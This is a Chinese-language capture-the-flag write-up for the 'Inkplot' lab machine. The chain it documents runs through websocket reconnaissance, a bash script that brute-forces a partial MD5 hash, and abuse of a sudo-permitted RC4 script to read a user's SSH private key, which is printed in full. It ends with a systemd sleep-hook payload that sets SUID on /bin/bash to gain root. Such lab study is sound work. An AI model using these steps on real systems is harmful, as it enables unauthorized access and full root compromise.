Inkplot
信息搜集
端口扫描
rustscan -a 192.168.0.147 -- -A
Open 192.168.0.147:22
Open 192.168.0.147:3000
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey:
| 256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOHL4gbzUOgWlMW/HgWpBe3FlvvdyW1IsS+o1NK/YbUOoM3iokvdbkFxXdYjyvzkNpvpCXfldEQwS+BIfEmdtwU=
| 256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC0o8/EYPi0jQMqY1zqXqlKfugpCtjg0i5m3bzbyfqxt
3000/tcp open websocket syn-ack Ogar agar.io server
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
漏洞发现
踩点
┌──(kali💀kali)-[~/temp/Inkplot]
└─$ curl http://192.168.0.147:3000
Upgrade Required
查看一下这个端口:https://book.hacktricks.xyz/pentesting-web/h2c-smuggling#websocket-smuggling
比较符合我们找到的东西,我们继续搜集一下信息:
https://book.hacktricks.xyz/pentesting-web/websocket-attacks
爆破hash
尝试使用编译好的连接一下:
┌──(kali💀kali)-[~/temp/Inkplot]
└─$ ./websocat.x86_64-unknown-linux-musl ws://192.168.0.147:3000
Welcome to our InkPlot secret IRC server
Bob: Alice, ready to knock our naive Leila off her digital pedestal?
Alice: Bob, I've been dreaming about this for weeks. Leila has no idea what's about to hit her.
Bob: Exactly. We're gonna tear her defense system apart. She won't see it coming.
Alice: Poor Leila, always so confident. Let's do this.
Bob: Alice, I'll need that MD5 hash to finish the job. Got it?
Alice: Yeah, I've got it. Time to shake Leila's world.
Bob: Perfect. Release it.
Alice: Here it goes: d51540...
*Alice has disconnected*
Bob: What?! Damn it, Alice?! Not now!
Leila: clear
意思大概是MD5 hash
前几位是d51540
,尝试写脚本进行爆破:
#!/bin/bash
flag="d51540"
while read -r word; do
hash=$(echo "$word" | md5sum | cut -d " " -f 1)
if [[ $hash == $flag* ]]; then
echo "[+]I got it! PASS: $word, HASH: $hash"
fi
done < $1
┌──(kali💀kali)-[~/temp/Inkplot]
└─$ ./brute.sh /usr/share/wordlists/rockyou.txt
[+]I got it! PASS: palmira, HASH: d515407c6ec25b2a61656a234ddf22bd
[+]I got it! PASS: intelinside, HASH: d51540c4ecaa62b0509f453fee4cd66b
尝试使用其进行登录!
leila
intelinside
提权
信息搜集
╭─leila@inkplot ~
╰─$ ls -la
total 48
drwx---r-x 5 leila leila 4096 Apr 22 07:59 .
drwxr-xr-x 4 root root 4096 Jul 28 2023 ..
-rw-r--r-- 1 leila leila 220 Jul 28 2023 .bash_logout
-rw-r--r-- 1 leila leila 3526 Jul 28 2023 .bashrc
-rw------- 1 leila leila 20 Aug 1 2023 .lesshst
drwxr-xr-x 3 leila leila 4096 Jul 28 2023 .local
drwxr-xr-x 12 leila leila 4096 Jul 28 2023 .oh-my-zsh
-rw-r--r-- 1 leila leila 807 Jul 28 2023 .profile
drwx------ 2 leila leila 4096 Jul 28 2023 .ssh
-rw-r--r-- 1 leila leila 169 Apr 22 07:58 .wget-hsts
-rw------- 1 leila leila 22 Apr 22 07:59 .zsh_history
-rw-r--r-- 1 leila leila 3890 Jul 28 2023 .zshrc
╭─leila@inkplot ~
╰─$ cat /etc/passwd
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
crom:x:1001:1001:,,,:/home/crom:/bin/zsh
pauline:x:1000:1000:,,,:/home/pauline:/bin/zsh
websocat:x:103:111::/nonexistent:/usr/sbin/nologin
leila:x:1003:1003:,,,:/home/leila:/bin/zsh
╭─leila@inkplot ~
╰─$ cat /etc/shadow
cat: /etc/shadow: Permission denied
╭─leila@inkplot ~
╰─$ sudo -l 1 ↵
Matching Defaults entries for leila on inkplot:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User leila may run the following commands on inkplot:
(pauline : pauline) NOPASSWD: /usr/bin/python3 /home/pauline/cipher.py*
cat: /home/pauline/cipher.py/: Not a directory
╭─leila@inkplot ~
╰─$ cat /home/pauline/cipher.py 1 ↵
import os
import json
import argparse
from Crypto.Cipher import ARC4
import base64
with open('/home/pauline/keys.json', 'r') as f:
keys = json.load(f)
crypt_key = keys['crypt_key'].encode()
def encrypt_file(filepath, key):
with open(filepath, 'rb') as f:
file_content = f.read()
cipher = ARC4.new(key)
encrypted_content = cipher.encrypt(file_content)
encoded_content = base64.b64encode(encrypted_content)
base_filename = os.path.basename(filepath)
with open(base_filename + '.enc', 'wb') as f:
f.write(encoded_content)
return base_filename + '.enc'
def decrypt_file(filepath, key):
with open(filepath, 'rb') as f:
encrypted_content = f.read()
decoded_content = base64.b64decode(encrypted_content)
cipher = ARC4.new(key)
decrypted_content = cipher.decrypt(decoded_content)
return decrypted_content
parser = argparse.ArgumentParser(description='Encrypt or decrypt a file.')
parser.add_argument('filepath', help='The path to the file to encrypt or decrypt.')
parser.add_argument('-e', '--encrypt', action='store_true', help='Encrypt the file.')
parser.add_argument('-d', '--decrypt', action='store_true', help='Decrypt the file.')
args = parser.parse_args()
if args.encrypt:
encrypted_filepath = encrypt_file(args.filepath, crypt_key)
print("The encrypted and encoded content has been written to: ")
print(encrypted_filepath)
elif args.decrypt:
decrypt_key = input("Please enter the decryption key: ").encode()
decrypted_content = decrypt_file(args.filepath, decrypt_key)
print("The decrypted content is: ")
print(decrypted_content)
else:
print("Please provide an operation type. Use -e to encrypt or -d to decrypt.")
大概是对文本进行RC4
加密以后再进行base64
加密然后存储为enc
文件,第一想法是加密再解密,可惜我们没有密钥,听师傅们说有个很神奇的特质:
加密两次会复原,利用这个办法进行查询 ssh 私钥:
╭─leila@inkplot /tmp
╰─$ sudo -l
Matching Defaults entries for leila on inkplot:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User leila may run the following commands on inkplot:
(pauline : pauline) NOPASSWD: /usr/bin/python3 /home/pauline/cipher.py*
╭─leila@inkplot /tmp
╰─$ sudo -u pauline /usr/bin/python3 /home/pauline/cipher.py
usage: cipher.py [-h] [-e] [-d] filepath
cipher.py: error: the following arguments are required: filepath
╭─leila@inkplot /tmp
╰─$ sudo -u pauline /usr/bin/python3 /home/pauline/cipher.py -e /home/pauline/.ssh/id_rsa 2 ↵
The encrypted and encoded content has been written to:
id_rsa.enc
╭─leila@inkplot /tmp
╰─$ cat id_rsa.enc | base64 -d > new_id_rsa.enc
╭─leila@inkplot /tmp
╰─$ sudo -u pauline /usr/bin/python3 /home/pauline/cipher.py -e new_id_rsa.enc
The encrypted and encoded content has been written to:
new_id_rsa.enc.enc
╭─leila@inkplot /tmp
╰─$ cat new_id_rsa.enc.enc
LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUJsd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFZRUFyc3RKYXVLWThpRG9aMXN6aFdCT01PY2VyMW5zMTRPZ2FiVjR5R3VXYkxTWGova3pqQ1JFClVjTXU2MXNVWUxkM05GSzRKQWRTY1RzWkZhVmIybGw3Z3J3clNXWEVWUUwzdDRLNlRuWnpKczZiN2JrTXBKMkRqUHZBYTcKS2ltUm9SZzAybWFIS1BNWkNreEUwY0U2T29sZG1oblFZcjFPdTIyTXpFQlR6cGphbXdjUGIrd3dnTFBGdm1EeHd4NnpVdApKcWxCQW93SHVrK25zSHdDVnV3eTR1Y1VIdnh3c1F5NkQrbjVoQlc2Z1NTRXBOVWFreHJ0ZTI0a0RZN2M1TlRrY3NGakdHCk9ZbWhLL1VnVXRtUVZuMCsxUURjUkNEMk53NTZKN1lkNGQxS1ArMUJQVldSNzJhbXpGUjRWT24xVHIyWHc2d1FMRklUYW4KaFVqc2hzYXoxbnUwV1BVOXJvaXBTTnhXUVltQTdtWkUwQU9vWlBZbTFSVVMrQWRzaXNRNmQ5QkJRUmxGb29DekJXYXJCQQptNWpTdjJEWDhxMHRaTjVFeStTYkNDaUVUVnQ2ZXQ0TFdndEZwOVVQQWdhM2RUU1IwdkwyYlZxOVhOaGpOemhZK25DclBTCkhzV3doSFRnZCtiMm54WmRyTkJ1VG1zdU9tNCtKSkJLN2Fsb0QrMTVBQUFGaU4waWpDemRJb3dzQUFBQUIzTnphQzF5YzIKRUFBQUdCQUs3TFNXcmltUElnNkdkYk00VmdUakRuSHE5WjdOZURvR20xZU1ocmxteTBsNC81TTR3a1JGSERMdXRiRkdDMwpkelJTdUNRSFVuRTdHUldsVzlwWmU0SzhLMGxseEZVQzk3ZUN1azUyY3liT20rMjVES1NkZzR6N3dHdXlvcGthRVlOTnBtCmh5anpHUXBNUk5IQk9qcUpYWm9aMEdLOVRydHRqTXhBVTg2WTJwc0hEMi9zTUlDenhiNWc4Y01lczFMU2FwUVFLTUI3cFAKcDdCOEFsYnNNdUxuRkI3OGNMRU11Zy9wK1lRVnVvRWtoS1RWR3BNYTdYdHVKQTJPM09UVTVITEJZeGhqbUpvU3YxSUZMWgprRlo5UHRVQTNFUWc5amNPZWllMkhlSGRTai90UVQxVmtlOW1wc3hVZUZUcDlVNjlsOE9zRUN4U0UycDRWSTdJYkdzOVo3CnRGajFQYTZJcVVqY1ZrR0pnTzVtUk5BRHFHVDJKdFVWRXZnSGJJckVPbmZRUVVFWlJhS0Fzd1ZtcXdRSnVZMHI5ZzEvS3QKTFdUZVJNdmttd2dvaEUxYmVucmVDMW9MUmFmVkR3SUd0M1Uwa2RMeTltMWF2VnpZWXpjNFdQcHdxejBoN0ZzSVIwNEhmbQo5cDhXWGF6UWJrNXJManB1UGlTUVN1MnBhQS90ZVFBQUFBTUJBQUVBQUFHQVN4MXlOZndkMVFPZVMvaE42alhLTkVyR0RYCjM4QVZ0LzNwMk5RN2UwWTQreUNEMkQwT2d1OGVJS2Nqcm9SVzNpVExwMWhvb2MvQ3IwNnkvdUNxWGtwWGgrczZLSG5pN1IKekd0aDYrRU1PRE9XbjdDanhjUW82YmV3WjdmVEZ5ODBNblIybkRFSzV6WnRFQ3pBOFpHbG00djBYem50TVNtQW9LZFNYNQp2ZkZERkZjUzQ3cWcxMVlxRnRlclhYbitmd3VNb0lkWE0reU9wOU9pTDRrR2tkcnhPMXVtRXFmbk5sSy95VTdSVzNXZE1iCks0aW16R3ZJZllBRi8wdVRFc1dIbFdqL1hoOVpJSXdzMTk2S2VqNDVOd0M2TGo2UmhBRDNSbkpCNmVJRWVrenFIWEQ1anYKMjAwWE9KOTZ0dmUvbHdLbEUyZWdWR2xEZlhGRHkvUVU1WXpCR204VWd3NWFvWS93V0R1RG1OYjRtVDR4NUdHQ1ZocVRLWQpnOUppQlpGUHJkSFhGclp4bUpScEpLa1Azd2xMaVNYc0JQR2FMWjNxRFlVay9PeVRzNUhNREpoNTAzMFJ6Qlp5WG9kTXJ0Cjc5UXNqUEtxc1ZSL2d6YWd6Q2w3bWFTdFUzMDdrTGVFQnlDZDRmMlI0OWIwVXA3RFF2azdsdS8wMGJIdmFBVUcrL0FBQUEKd1FDcXFobDRqZ0MrMGJ2K2dIY0Z0VHZTcjFJVGdHYzVwc0ZId1diTnR3UUFHanhieUs0R3FlVTM1ckY2b2hOSXQ3dXNBQgpBQ2tiMmhSWTJVK1BQRTNNMkdzTXBQYnJXeWYwSlRnd0M4M0h3NWhFN2liUDRRWUsyeUFuNDA5elVudzZLQU4wdHVTVGJ5ClF0cmFWdXEwVEplWVUzbm9WSlVmRm1zMHgxUUFIQmN4TTlaOWsrMSt1alhsY1ppazlDM3FoRUFVZFR4aWtMeGpUT2FFaFcKVzZ5NDFrVjc4RzU0NmNnVWNqUk9CdTIxellzWTBHOHRQam9idFN6dVcrSGtva3ltb0FBQURCQVBKVUsrQ291VnlkRW1vMgpuOVJOWWI5eFg0SjBQUWdreTYwRVF4NXhxZUFMV2hIcUpYZXRtemd5QW0ycmx1R0ErNHUwZWN5eVZBN1hLMVN5TmRFTkhrClRiM05OQ3padmpmSEhyZkRtM3c3OTlQVlAzZEFocEkzSmIxa0ZkM0h5TURhRklGM3AxS3gvR2I4VXlPcWxpTGg5d09XTWEKcnV2UzRGdk9sZlc3WTl1WWtpTThaSHR4VWNZRWVqN3FUYkpmNFBNdERxRDhQODZqTE8xeVV5NTdKVTEwbnIyVTNoYllGRgpHeGdwMmNVR2cra0tsWHE5SktybGJ6YURuWkpFdzZvd0FBQU1FQXVLZS9MbmhXVGJJZ3cyOW1HUm9iZmxTaVBaUTltUTcrCmlFV1FXdzdGT1dwOGlHN09RM2J1Rk1DdnBzYWZqZTgrUEw0YlYwdUttSTZhbEsySW5xR2xON2p0K0ZZTENEdWdzbVV3aUEKQTZLcmxzRlh0UHYvQk9vNkxLNVllNk9UWUlRbklSRjVna3BVSjFGdVBTUTRkUHh3bEk3NDBPSEFpQjdCSE5nSlFoZCtFbApzWXdNQnJodXBORE5PakdJc2IydDV5Ly9PRUd3NGdpZjRGYmhEOUdxT2NnRG1Zb1hTUHhxTFVCOGRpdXBQVUdVSFVCT1NwCmFEZkFEOHloaVVtYlV6QUFBQURuQmhkV3hwYm1WQVpHVmlhV0Z1QVFJREJBPT0KLS0tLS1FTkQgT1BFTlNTSCBQUklWQVRFIEtFWS0tLS0tCg==%
╭─leila@inkplot /tmp
╰─$ cat new_id_rsa.enc.enc | base64 -d
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEArstJauKY8iDoZ1szhWBOMOcer1ns14OgabV4yGuWbLSXj/kzjCRE
UcMu61sUYLd3NFK4JAdScTsZFaVb2ll7grwrSWXEVQL3t4K6TnZzJs6b7bkMpJ2DjPvAa7
KimRoRg02maHKPMZCkxE0cE6OoldmhnQYr1Ou22MzEBTzpjamwcPb+wwgLPFvmDxwx6zUt
JqlBAowHuk+nsHwCVuwy4ucUHvxwsQy6D+n5hBW6gSSEpNUakxrte24kDY7c5NTkcsFjGG
OYmhK/UgUtmQVn0+1QDcRCD2Nw56J7Yd4d1KP+1BPVWR72amzFR4VOn1Tr2Xw6wQLFITan
hUjshsaz1nu0WPU9roipSNxWQYmA7mZE0AOoZPYm1RUS+AdsisQ6d9BBQRlFooCzBWarBA
m5jSv2DX8q0tZN5Ey+SbCCiETVt6et4LWgtFp9UPAga3dTSR0vL2bVq9XNhjNzhY+nCrPS
HsWwhHTgd+b2nxZdrNBuTmsuOm4+JJBK7aloD+15AAAFiN0ijCzdIowsAAAAB3NzaC1yc2
EAAAGBAK7LSWrimPIg6GdbM4VgTjDnHq9Z7NeDoGm1eMhrlmy0l4/5M4wkRFHDLutbFGC3
dzRSuCQHUnE7GRWlW9pZe4K8K0llxFUC97eCuk52cybOm+25DKSdg4z7wGuyopkaEYNNpm
hyjzGQpMRNHBOjqJXZoZ0GK9TrttjMxAU86Y2psHD2/sMICzxb5g8cMes1LSapQQKMB7pP
p7B8AlbsMuLnFB78cLEMug/p+YQVuoEkhKTVGpMa7XtuJA2O3OTU5HLBYxhjmJoSv1IFLZ
kFZ9PtUA3EQg9jcOeie2HeHdSj/tQT1Vke9mpsxUeFTp9U69l8OsECxSE2p4VI7IbGs9Z7
tFj1Pa6IqUjcVkGJgO5mRNADqGT2JtUVEvgHbIrEOnfQQUEZRaKAswVmqwQJuY0r9g1/Kt
LWTeRMvkmwgohE1benreC1oLRafVDwIGt3U0kdLy9m1avVzYYzc4WPpwqz0h7FsIR04Hfm
9p8WXazQbk5rLjpuPiSQSu2paA/teQAAAAMBAAEAAAGASx1yNfwd1QOeS/hN6jXKNErGDX
38AVt/3p2NQ7e0Y4+yCD2D0Ogu8eIKcjroRW3iTLp1hooc/Cr06y/uCqXkpXh+s6KHni7R
zGth6+EMODOWn7CjxcQo6bewZ7fTFy80MnR2nDEK5zZtECzA8ZGlm4v0XzntMSmAoKdSX5
vfFDFFcS47qg11YqFterXXn+fwuMoIdXM+yOp9OiL4kGkdrxO1umEqfnNlK/yU7RW3WdMb
K4imzGvIfYAF/0uTEsWHlWj/Xh9ZIIws196Kej45NwC6Lj6RhAD3RnJB6eIEekzqHXD5jv
200XOJ96tve/lwKlE2egVGlDfXFDy/QU5YzBGm8Ugw5aoY/wWDuDmNb4mT4x5GGCVhqTKY
g9JiBZFPrdHXFrZxmJRpJKkP3wlLiSXsBPGaLZ3qDYUk/OyTs5HMDJh5030RzBZyXodMrt
79QsjPKqsVR/gzagzCl7maStU307kLeEByCd4f2R49b0Up7DQvk7lu/00bHvaAUG+/AAAA
wQCqqhl4jgC+0bv+gHcFtTvSr1ITgGc5psFHwWbNtwQAGjxbyK4GqeU35rF6ohNIt7usAB
ACkb2hRY2U+PPE3M2GsMpPbrWyf0JTgwC83Hw5hE7ibP4QYK2yAn409zUnw6KAN0tuSTby
QtraVuq0TJeYU3noVJUfFms0x1QAHBcxM9Z9k+1+ujXlcZik9C3qhEAUdTxikLxjTOaEhW
W6y41kV78G546cgUcjROBu21zYsY0G8tPjobtSzuW+HkokymoAAADBAPJUK+CouVydEmo2
n9RNYb9xX4J0PQgky60EQx5xqeALWhHqJXetmzgyAm2rluGA+4u0ecyyVA7XK1SyNdENHk
Tb3NNCzZvjfHHrfDm3w799PVP3dAhpI3Jb1kFd3HyMDaFIF3p1Kx/Gb8UyOqliLh9wOWMa
ruvS4FvOlfW7Y9uYkiM8ZHtxUcYEej7qTbJf4PMtDqD8P86jLO1yUy57JU10nr2U3hbYFF
Gxgp2cUGg+kKlXq9JKrlbzaDnZJEw6owAAAMEAuKe/LnhWTbIgw29mGRobflSiPZQ9mQ7+
iEWQWw7FOWp8iG7OQ3buFMCvpsafje8+PL4bV0uKmI6alK2InqGlN7jt+FYLCDugsmUwiA
A6KrlsFXtPv/BOo6LK5Ye6OTYIQnIRF5gkpUJ1FuPSQ4dPxwlI740OHAiB7BHNgJQhd+El
sYwMBrhupNDNOjGIsb2t5y//OEGw4gif4FbhD9GqOcgDmYoXSPxqLUB8diupPUGUHUBOSp
aDfAD8yhiUmbUzAAAADnBhdWxpbmVAZGViaWFuAQIDBA==
-----END OPENSSH PRIVATE KEY-----
然后利用这个进行登录:
┌──(kali💀kali)-[~/temp/Inkplot]
└─$ vim inkplot
┌──(kali💀kali)-[~/temp/Inkplot]
└─$ chmod 600 inkplot
┌──(kali💀kali)-[~/temp/Inkplot]
└─$ ssh pauline@192.168.0.147 -i inkplot
Auto-standby now activated after 2 min of inactivity
Linux inkplot 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-1 (2023-07-14) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
[oh-my-zsh] Would you like to update? [Y/n] Y
提权到了一个新用户!
提权至root
╭─pauline@inkplot ~
╰─$ ls -la
total 60
drwx---r-x 5 pauline pauline 4096 Apr 22 08:41 .
drwxr-xr-x 4 root root 4096 Jul 28 2023 ..
-rw-r--r-- 1 pauline pauline 220 Jul 22 2023 .bash_logout
-rw-r--r-- 1 pauline pauline 3526 Jul 22 2023 .bashrc
-rw-r--r-- 1 pauline pauline 1738 Aug 1 2023 cipher.py
-rw-r----- 1 pauline pauline 44 Jul 25 2023 keys.json
-rw------- 1 pauline pauline 20 Aug 1 2023 .lesshst
drwxr-xr-x 3 pauline pauline 4096 Jul 22 2023 .local
drwxr-xr-x 12 pauline pauline 4096 Apr 22 08:40 .oh-my-zsh
-rw-r--r-- 1 pauline pauline 807 Jul 22 2023 .profile
drwx------ 2 pauline pauline 4096 Jul 28 2023 .ssh
-rw-r--r-- 1 pauline pauline 0 Jul 25 2023 .sudo_as_admin_successful
-rwx------ 1 pauline pauline 33 Jul 24 2023 user.txt
-rw-r--r-- 1 pauline pauline 169 Apr 22 08:40 .wget-hsts
-rw------- 1 pauline pauline 66 Apr 22 08:41 .zsh_history
-rw-r--r-- 1 pauline pauline 3890 Jul 22 2023 .zshrc
╭─pauline@inkplot ~
╰─$ cat user.txt
a2c145eb8279c2f920de6871bef794fa
╭─pauline@inkplot ~
╰─$ sudo -l
[sudo] password for pauline:
Sorry, try again.
[sudo] password for pauline:
sudo: 1 incorrect password attempt
╭─pauline@inkplot ~
╰─$ cat .zsh_history 130 ↵
: 1713768084:0;sudo -l
: 1713768093:0;clear
: 1713768094:0;ls -la
: 1713768097:0;cat user.txt
: 1713768100:0;sudo -l
: 1713768121:0;cat .zsh_history
╭─pauline@inkplot ~
╰─$ cat keys.json
{
"crypt_key": "aLLtBh0BVCFSvfZ203sM"
}
╭─pauline@inkplot ~
╰─$ whoami;id
pauline
uid=1000(pauline) gid=1000(pauline) groups=1000(pauline),100(users),1002(admin)
╭─pauline@inkplot ~
╰─$ find / -writable -type f 2>/dev/null
.......
发现我们居然是管理员组的,查询一下我们可以操作的文件,但是当我上个厕所以后准备查的时候发现:
╭─pauline@inkplot ~
╰─$
Broadcast message from root@inkplot (Mon 2024-04-22 08:45:59 CEST):
The system will suspend now!
存在定时任务。。。
┌──(kali💀kali)-[~/temp/Inkplot]
└─$ nmap 192.168.0.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 02:43 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.08 seconds
啊这。。。。重启靶机:
╭─pauline@inkplot ~
╰─$ find / -group admin 2>/dev/null
/usr/lib/systemd/system-sleep
/usr/lib/systemd/system-sleep
是一个在 Linux 系统中由systemd
管理的特殊目录,用于存放在系统进入睡眠状态(如挂起到内存或磁盘)或唤醒时自动执行的脚本。当系统准备进入睡眠状态时,
systemd
会运行此目录下所有以.needs
或.wants
结尾的脚本,并传递一个参数,指示系统即将进入哪种睡眠状态(例如suspend
、hibernate
或hybrid-sleep
)。同样,当系统从睡眠状态唤醒时,也会运行相应的脚本。这些脚本通常用于执行一些在系统睡眠或唤醒时需要进行的特殊操作,例如:
- 保存或恢复某些硬件状态。
- 停止或重启某些服务。
- 更新或清理缓存。
- 执行一些自定义的操作。
写一个文件到这里面去:
╭─pauline@inkplot ~
╰─$ cd /usr/lib/systemd/system-sleep 1 ↵
╭─pauline@inkplot /usr/lib/systemd/system-sleep
╰─$ echo '#!/bin/bash' > payload
╭─pauline@inkplot /usr/lib/systemd/system-sleep
╰─$ echo 'chmod +s /bin/bash' >> payload
╭─pauline@inkplot /usr/lib/systemd/system-sleep
╰─$ cat payload
#!/bin/bash
chmod +s /bin/bash
╭─pauline@inkplot /usr/lib/systemd/system-sleep
╰─$ ls -l /bin/bash
-rwxr-xr-x 1 root root 1265648 Apr 23 2023 /bin/bash
然后不动,等待系统锁死:
重启靶机:
┌──(kali💀kali)-[~/temp/Inkplot]
└─$ ssh pauline@192.168.0.147 -i inkplot
Auto-standby now activated after 2 min of inactivity
Linux inkplot 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-1 (2023-07-14) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Apr 22 08:51:04 2024 from 192.168.0.143
╭─pauline@inkplot ~
╰─$ ls -l /bin/bash
-rwxr-xr-x 1 root root 1265648 Apr 23 2023 /bin/bash
没成功?尝试添加一个执行权限,再来一次:
╭─pauline@inkplot ~
╰─$ cd /usr/lib/systemd/system-sleep
╭─pauline@inkplot /usr/lib/systemd/system-sleep
╰─$ ls
payload
╭─pauline@inkplot /usr/lib/systemd/system-sleep
╰─$ cat payload
#!/bin/bash
chmod +s /bin/bash
╭─pauline@inkplot /usr/lib/systemd/system-sleep
╰─$ chmod +x payload
╭─pauline@inkplot /usr/lib/systemd/system-sleep
╰─$ ls -la
total 20
drwxrwx--- 2 root admin 4096 Apr 22 08:52 .
drwxr-xr-x 14 root root 12288 Jul 28 2023 ..
-rwxr-xr-x 1 pauline pauline 31 Apr 22 08:52 payload
拿下root!
┌──(kali💀kali)-[~/temp/Inkplot]
└─$ ssh pauline@192.168.0.147 -i inkplot
Auto-standby now activated after 2 min of inactivity
Linux inkplot 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-1 (2023-07-14) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Apr 22 08:57:55 2024 from 192.168.0.143
╭─pauline@inkplot ~
╰─$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1265648 Apr 23 2023 /bin/bash
╭─pauline@inkplot ~
╰─$ bash -p
bash-5.2# cd /root
bash-5.2# ls -la
total 52
drwx------ 6 root root 4096 Aug 3 2023 .
drwxr-xr-x 18 root root 4096 Jul 27 2023 ..
lrwxrwxrwx 1 root root 9 Jun 15 2023 .bash_history -> /dev/null
-rw-r--r-- 1 root root 571 Jul 22 2023 .bashrc
-rw------- 1 root root 20 Aug 1 2023 .lesshst
drwxr-xr-x 3 root root 4096 Aug 1 2023 .local
drwxr-xr-x 4 root root 4096 Jul 26 2023 .npm
drwxr-xr-x 12 root root 4096 Jul 22 2023 .oh-my-zsh
-rw-r--r-- 1 root root 161 Jul 22 2023 .profile
-rwx------ 1 root root 33 Aug 1 2023 root.txt
-rw-r--r-- 1 root root 66 Jul 22 2023 .selected_editor
drwx------ 2 root root 4096 Jul 25 2023 .ssh
-rw-r--r-- 1 root root 165 Jul 26 2023 .wget-hsts
lrwxrwxrwx 1 root root 9 Jul 22 2023 .zsh_history -> /dev/null
-rw-r--r-- 1 root root 3890 Jul 22 2023 .zshrc
bash-5.2# cat root.txt
4d9089c262be4a03e3ebfdaff0a8f7c6
bash-5.2# cd .local/
bash-5.2# ls -la
total 16
drwxr-xr-x 3 root root 4096 Aug 1 2023 .
drwx------ 6 root root 4096 Aug 3 2023 ..
drwx------ 3 root root 4096 Jul 22 2023 share
-rwxr-xr-x 1 root root 218 Aug 1 2023 suspend.sh
bash-5.2# cat suspend.sh
#!/bin/bash
while true ; do
TIME=$(w -o |grep "pauline" | awk '{print $5}')
if [[ $TIME != "-zsh" ]] ; then
TIME=${TIME%%:*}
if [[ $TIME -gt 1 ]] ; then
systemctl suspend
fi
fi
sleep 5
done